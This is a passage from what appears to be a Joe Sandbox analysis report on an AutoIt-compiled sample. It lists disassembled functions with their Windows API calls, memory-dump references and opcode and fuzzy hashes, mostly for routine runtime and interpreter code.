                                                                                                                • Opcode Fuzzy Hash: e3025d5d1bb8fce0bda6073d39d2ebcbfc3ae4d4f55f85f084de6a1b13afa002
                                                                                                                • Instruction Fuzzy Hash: 34219DB211120EAFDF129FA8ED49FEE7BA9EF04315F044015FA00A21A0C776CD65DB60
                                                                                                                Function 0026E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
                                                                                                                  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B5FA
                                                                                                                  • Part of subcall function 0021B58B: BeginPath.GDI32(?), ref: 0021B611
                                                                                                                  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B63B
                                                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0026E9F2
                                                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0026EA06
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0026EA14
                                                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0026EA24
                                                                                                                • EndPath.GDI32(00000000), ref: 0026EA34
                                                                                                                • StrokePath.GDI32(00000000), ref: 0026EA44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                • Opcode ID: 0a8891dfda57af4b6bd7182c44de197ef05f57385640bb350aabcfadcdb6e2b9
                                                                                                                • Instruction ID: 2cbaaccf56e3f6ca86dc75c5a81b8803e5bfb2361049211a9f980c29e5318f1e
                                                                                                                • Opcode Fuzzy Hash: 0a8891dfda57af4b6bd7182c44de197ef05f57385640bb350aabcfadcdb6e2b9
                                                                                                                • Instruction Fuzzy Hash: 9E110C7A001149BFEF029F94EC88E9A7FADEF04350F048021FE09591A1D7719D69DBA0
                                                                                                                Function 0023EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0023EFB6
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0023EFC7
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0023EFCE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0023EFD6
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0023EFED
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0023EFFF
                                                                                                                  • Part of subcall function 0023A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0023A79D,00000000,00000000,?,0023AB73), ref: 0023B2CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 603618608-0
                                                                                                                • Opcode ID: 2486b1591e430bc2c1fa76199b260a5496f4f65967b8c4e9c93a29859ee75d09
                                                                                                                • Instruction ID: f2a11b7ece32227e2f31c1b46973b252d49843ef9164ec2919e7c36077bf3a65
                                                                                                                • Opcode Fuzzy Hash: 2486b1591e430bc2c1fa76199b260a5496f4f65967b8c4e9c93a29859ee75d09
                                                                                                                • Instruction Fuzzy Hash: 2E0184B5A01219BFEF109BA5AC49B5EBFB8EF48751F004066FE04AB2D0D6709C14CF61
                                                                                                                Function 002287D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 002287D7
                                                                                                                  • Part of subcall function 00221E5A: __initp_misc_winsig.LIBCMT ref: 00221E7E
                                                                                                                  • Part of subcall function 00221E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00228BE1
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00228BF5
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00228C08
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00228C1B
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00228C2E
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00228C41
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00228C54
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00228C67
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00228C7A
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00228C8D
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00228CA0
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00228CB3
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00228CC6
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00228CD9
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00228CEC
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00228CFF
                                                                                                                • __mtinitlocks.LIBCMT ref: 002287DC
                                                                                                                  • Part of subcall function 00228AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(002BAC68,00000FA0,?,?,002287E1,00226AFA,002B67D8,00000014), ref: 00228AD1
                                                                                                                • __mtterm.LIBCMT ref: 002287E5
                                                                                                                  • Part of subcall function 0022884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002287EA,00226AFA,002B67D8,00000014), ref: 002289CF
                                                                                                                  • Part of subcall function 0022884D: _free.LIBCMT ref: 002289D6
                                                                                                                  • Part of subcall function 0022884D: DeleteCriticalSection.KERNEL32(002BAC68,?,?,002287EA,00226AFA,002B67D8,00000014), ref: 002289F8
                                                                                                                • __calloc_crt.LIBCMT ref: 0022880A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00228833
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2942034483-0
                                                                                                                • Opcode ID: d4cb1c930692dbeb20ef855344d778cc7efa343cd3edff493faf771abe658991
                                                                                                                • Instruction ID: 561ea90463a4c8b7261a9f3e0d2c8c432a526187a2183ab9ffda0c86a636b1fd
                                                                                                                • Opcode Fuzzy Hash: d4cb1c930692dbeb20ef855344d778cc7efa343cd3edff493faf771abe658991
                                                                                                                • Instruction Fuzzy Hash: 89F0B43353B7327AE2247FF87C0BA4A26C48F01730B614A2AF464D90E2FF11D8714952
                                                                                                                Function 0024A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1423608774-0
                                                                                                                • Opcode ID: c53d9f4274c5088db4a7c28922ee6238e8b2d785603c5a95feca93fecf72e3bd
                                                                                                                • Instruction ID: 68347626e7b241c9e41b9a8716294e0f1739333bae8d8a2d526619a1acfb4705
                                                                                                                • Opcode Fuzzy Hash: c53d9f4274c5088db4a7c28922ee6238e8b2d785603c5a95feca93fecf72e3bd
                                                                                                                • Instruction Fuzzy Hash: C401813A152612ABD7192F54FD8CDEB7B7AFF89712B000569F903920A6DB60A814CB51
                                                                                                                Function 00201867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00201898
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 002018A0
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002018AB
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002018B6
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 002018BE
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 002018C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: 40af35908db36e3a63ba8db9ab3cabb41b74f90340c7f9851ebdbe3453f991cc
                                                                                                                • Instruction ID: c47299f0c59b0fe6443dc91aaad4d730a3a843bfced34d51d0ac1f147b56fc98
                                                                                                                • Opcode Fuzzy Hash: 40af35908db36e3a63ba8db9ab3cabb41b74f90340c7f9851ebdbe3453f991cc
                                                                                                                • Instruction Fuzzy Hash: 630148B0902B597DE3008F6A8C85A52FFA8FF15354F04411B915C47941C7B5A864CBE5
                                                                                                                Function 002484F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00248504
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0024851A
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00248529
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248538
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248542
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248549
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: 3f9ce575d84980755258eaf6a04d0b10af4e28c3a57ac3d29b964591c48fb602
                                                                                                                • Instruction ID: f57a9f5955abff78a686c453766d91029d5fee5556bbd65da5cf7965d9aa07c2
                                                                                                                • Opcode Fuzzy Hash: 3f9ce575d84980755258eaf6a04d0b10af4e28c3a57ac3d29b964591c48fb602
                                                                                                                • Instruction Fuzzy Hash: 62F03076242169BBE7215B52BD0EEEF7B7CDFC6B15F000158FA05D1090E7A06A05C7B5
                                                                                                                Function 0024A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0024A330
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A341
                                                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A34E
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A35B
                                                                                                                  • Part of subcall function 00249CCE: CloseHandle.KERNEL32(?,?,0024A368,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 00249CD8
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0024A36E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A375
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 6132b1d9a5c90286594e265059bf67d6eaab6d1433dcf43e356852a5c8970162
                                                                                                                • Instruction ID: 48c4e31689f6cf28e57a5cdeafd5fa6cb9f3947a3fe14e143e8cfe39f27a3f0b
                                                                                                                • Opcode Fuzzy Hash: 6132b1d9a5c90286594e265059bf67d6eaab6d1433dcf43e356852a5c8970162
                                                                                                                • Instruction Fuzzy Hash: 04F0E23A042202ABD3152F64FC8CDDB7B7AFF89312B000061F603910F6DBB09814CB50
                                                                                                                Function 0020C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memmove.LIBCMT ref: 0020C419
                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00246653,?,?,00000000), ref: 0020C495
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead_memmove
                                                                                                                • String ID: Sf$
                                                                                                                • API String ID: 1325644223-2652856587
                                                                                                                • Opcode ID: c12c2cb008647b558e0b01e5acb79f2a69999c3b06303a984be454248af73f4f
                                                                                                                • Instruction ID: cd36422ad00cf7ab8f8f6a21ab54038dcf7ca5957634495b34fbbb5908c8eb47
                                                                                                                • Opcode Fuzzy Hash: c12c2cb008647b558e0b01e5acb79f2a69999c3b06303a984be454248af73f4f
                                                                                                                • Instruction Fuzzy Hash: F0A1EEB0A24209EBDB00DF55C884BADFBB4FF05300F24C295E8699A282D775E970DB91
                                                                                                                Function 0021D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 0020BBD9: _memmove.LIBCMT ref: 0020BC33
                                                                                                                • __swprintf.LIBCMT ref: 0021D98F
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0021D832
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                • Opcode ID: ee938d0d3ab7eadcfb6a62a886215ecdef33126bfa2a6a302499d32067948255
                                                                                                                • Instruction ID: f624a19a51bb938e631bf72b1e5470e8a9005bab7f2f2f06afaf0203ab3c40a3
                                                                                                                • Opcode Fuzzy Hash: ee938d0d3ab7eadcfb6a62a886215ecdef33126bfa2a6a302499d32067948255
                                                                                                                • Instruction Fuzzy Hash: F7915A71528312EFC714EF24C885CAAB7F5AF95700F004959F88A972A2DB70EE65CF52
                                                                                                                Function 0025B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025B4A8
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 0025B5B7
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0025B73A
                                                                                                                  • Part of subcall function 0024A6F6: VariantInit.OLEAUT32(00000000), ref: 0024A736
                                                                                                                  • Part of subcall function 0024A6F6: VariantCopy.OLEAUT32(?,?), ref: 0024A73F
                                                                                                                  • Part of subcall function 0024A6F6: VariantClear.OLEAUT32(?), ref: 0024A74B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: f526cf3e387b3df50bb74ffae9c5bf51ebca9a533d419456a5f3e68a38ecf5cc
                                                                                                                • Instruction ID: 88cb7cf491dee361d1a62e6a21e5912e79ce5781a7fcd3b9bfc20fb99afcece8
                                                                                                                • Opcode Fuzzy Hash: f526cf3e387b3df50bb74ffae9c5bf51ebca9a533d419456a5f3e68a38ecf5cc
                                                                                                                • Instruction Fuzzy Hash: 51918C746283029FCB14DF24C48496AB7F8EF89701F14486DF88A9B392DB31E959CF52
                                                                                                                Function 00245D65 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                • _memset.LIBCMT ref: 00245E56
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 00245E85
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00245F31
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00245F5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: 1b8c5c415e020900afaf90769dc887ffce84e454402a1540d26c4ebd4fe75620
                                                                                                                • Instruction ID: b4d1468d7ec8e58863c0680dd2d70dcc23744fe54693cbf7ed64a16ff8f8f643
                                                                                                                • Opcode Fuzzy Hash: 1b8c5c415e020900afaf90769dc887ffce84e454402a1540d26c4ebd4fe75620
                                                                                                                • Instruction Fuzzy Hash: 7D51F171634B22ABD3189F28C845A6BB7E4AF46710F090629F8D1D31D3DB70CD398B92
                                                                                                                Function 00241050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002410B8
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002410EE
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002410FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00241181
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: de0778c4f47cf0ce7107c85fc018cd8a3a01ac2ed8dc3ba5d2ce59979750ecc7
                                                                                                                • Instruction ID: f06ab4d1135997bc0727655c0f9db2bbe0880300c2d217e872d794ea35375b18
